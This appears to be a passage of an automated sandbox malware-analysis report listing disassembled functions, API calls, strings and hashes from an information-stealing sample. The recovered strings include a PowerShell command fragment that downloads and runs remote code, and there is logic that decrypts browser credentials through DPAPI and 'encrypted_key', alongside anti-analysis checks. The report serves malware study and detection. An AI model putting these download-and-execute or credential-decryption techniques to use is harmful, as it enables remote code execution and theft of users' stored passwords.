                                                            • Instruction Fuzzy Hash: CB3192B69503086BDF10FBF0CC84EED737AAB58700F8045C9B24696094EEB49789DF95
                                                            Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                            Strings
                                                            • <, xrefs: 00412D39
                                                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                            • ')", xrefs: 00412CB3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            • API String ID: 3031569214-898575020
                                                            • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                            • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                            • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                            • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                            Function 022D1487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022D14A5
                                                            • __aulldiv.LIBCMT ref: 022D14BF
                                                            • __aulldiv.LIBCMT ref: 022D14CD
                                                            • ExitProcess.KERNEL32 ref: 022D14FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                            • String ID: @
                                                            • API String ID: 3404098578-2766056989
                                                            • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                            • Instruction ID: 06d6101d926c31066536a6e1e8b75f2bc983d3fcd1a147eb1f670d67b98c375a
                                                            • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                            • Instruction Fuzzy Hash: 0E011DB0961308BAEF10DBD0CC89B9DBB7DAB00B05F609448E70A776C8D7B4A5958B55
                                                            Function 022DA077 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022E0CC7: memset.MSVCRT ref: 022E0E83
                                                              • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                                              • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                                              • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                                              • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • memcmp.MSVCRT(?,00421114,00000003), ref: 022DA116
                                                            • memset.MSVCRT ref: 022DA14F
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 022DA1A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                            • String ID: @
                                                            • API String ID: 1977917189-2766056989
                                                            • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                            • Instruction ID: 1033d2c68e6845531657e77deb6a04fad2dd76ddb81437c13d48f650b9555aab
                                                            • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                            • Instruction Fuzzy Hash: 05615C30A203489BDF24EFE4CD95FED7776AF54304F408118E90A5B698DBB46A05CF51
                                                            Function 00410D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strtok_s.MSVCRT ref: 00410DB8
                                                            • strtok_s.MSVCRT ref: 00410EFD
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 348468850-0
                                                            • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                            • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                            • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                            • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                            Function 00409CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                              • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                              • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                              • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                              • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                              • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                              • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                            • String ID: $"encrypted_key":"$DPAPI
                                                            • API String ID: 3731072634-738592651
                                                            • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                            • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                            • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                            • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                            Function 022ECDA0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CodeInfoPageValidmemset
                                                            • String ID:
                                                            • API String ID: 703783727-0
                                                            • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                            • Instruction ID: b1b66c0af393fb712239824e55ca1d3d67ab2e75243c17e9d4cbdf9bdafd0db6
                                                            • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                            • Instruction Fuzzy Hash: ED312B30A242929EDF259FF8C8542797FA09B06314B8841BBD883CF19AC778C405E762
                                                            Function 022E6B87 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTime.KERNEL32(?), ref: 022E6BD3
                                                            • sscanf.NTDLL ref: 022E6C00
                                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022E6C19
                                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022E6C27
                                                            • ExitProcess.KERNEL32 ref: 022E6C41
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$System$File$ExitProcesssscanf
                                                            • String ID:
                                                            • API String ID: 2533653975-0
                                                            • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                            • Instruction ID: eb3b71ad43b573599eead478bf84f8e489c540ff3c251f41f64a1c6ec8ece494
                                                            • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                            • Instruction Fuzzy Hash: F221EBB5D14209AFCF08EFE4D9499EEB7BAFF48300F44952EE406A3254EB345604CB65
                                                            Function 00417E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                            • RegOpenKeyExA.ADVAPI32(80000002,00872B00,00000000,00020119,?), ref: 00417E5E
                                                            • RegQueryValueExA.ADVAPI32(?,00879BD8,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                            • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3466090806-0
                                                            • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                            • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                            • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                            • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                            Function 022E8067 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E809E
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E80A5
                                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022E80C5
                                                            • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022E80E6
                                                            • RegCloseKey.ADVAPI32(?), ref: 022E80F9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3225020163-0
                                                            • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                            • Instruction ID: 1cfbfafacebd8db028af679e1c0ef27b95508f54e4dc37e628e7a89a8b328d39
                                                            • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                            • Instruction Fuzzy Hash: 6C113DB5A94209BBDB10CFD4DD4AFBBB7B9EB05710F104219F616A7290C7B558008BA2
                                                            Function 022E7987 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E799B
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E79A2
                                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022E7920), ref: 022E79C2
                                                            • RegQueryValueExA.ADVAPI32(022E7920,00420AAC,00000000,00000000,?,000000FF), ref: 022E79E1
                                                            • RegCloseKey.ADVAPI32(022E7920), ref: 022E79EB
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3225020163-0
                                                            • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                            • Instruction ID: 56d574a23b1c796c7e6fce387c749d245cc72171ec3e13636da9deb623f7c15c
                                                            • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                            • Instruction Fuzzy Hash: 850144B9A40308BFEB10DFE0DC49FAEB7B9EB48701F104159FA05A7280D67455008F51
                                                            Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrStrA.SHLWAPI(00879198,?,?,?,0041140C,?,00879198,00000000), ref: 0041926C
                                                            • lstrcpyn.KERNEL32(0064AB88,00879198,00879198,?,0041140C,?,00879198), ref: 00419290
                                                            • lstrlenA.KERNEL32(?,?,0041140C,?,00879198), ref: 004192A7
                                                            • wsprintfA.USER32 ref: 004192C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpynlstrlenwsprintf
                                                            • String ID: %s%s
                                                            • API String ID: 1206339513-3252725368
                                                            • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                            • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                                            • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                            • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                            Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                            • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                            • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3466090806-0
                                                            • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                            • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                            • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                            • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                            Function 022D1507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D151B
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022D1522
                                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022D153E
                                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022D155C
                                                            • RegCloseKey.ADVAPI32(?), ref: 022D1566
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3225020163-0
                                                            • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                            • Instruction ID: 63084d8a319a27892082af4f4125e024ba0b0ff5d856c36659a97c20f700532c
                                                            • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                            • Instruction Fuzzy Hash: A50131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                                            Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041C74E
                                                              • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                              • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                            • __getptd.LIBCMT ref: 0041C765
                                                            • __amsg_exit.LIBCMT ref: 0041C773
                                                            • __lock.LIBCMT ref: 0041C783
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                            • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                            • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                            • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                            Function 022EC9A9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __getptd.LIBCMT ref: 022EC9B5
                                                              • Part of subcall function 022EC206: __getptd_noexit.LIBCMT ref: 022EC209
                                                              • Part of subcall function 022EC206: __amsg_exit.LIBCMT ref: 022EC216
                                                            • __getptd.LIBCMT ref: 022EC9CC
                                                            • __amsg_exit.LIBCMT ref: 022EC9DA
                                                            • __lock.LIBCMT ref: 022EC9EA
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 022EC9FE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                            • Instruction ID: c7d4657104b6a573818c3436915559dddaa834fa843ce52a85352d05b71a7e59
                                                            • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                            • Instruction Fuzzy Hash: 20F096329603119FDF30BBE8550276D3391AF14728FD0410BD417A71D8DBA45540FF5A
                                                            Function 00410740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrCmpCA.SHLWAPI(00000000,00876070), ref: 0041079A
                                                            • StrCmpCA.SHLWAPI(00000000,00876170), ref: 00410866
                                                            • StrCmpCA.SHLWAPI(00000000,00876120), ref: 0041099D
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy
                                                            • String ID: `_A
                                                            • API String ID: 3722407311-2339250863
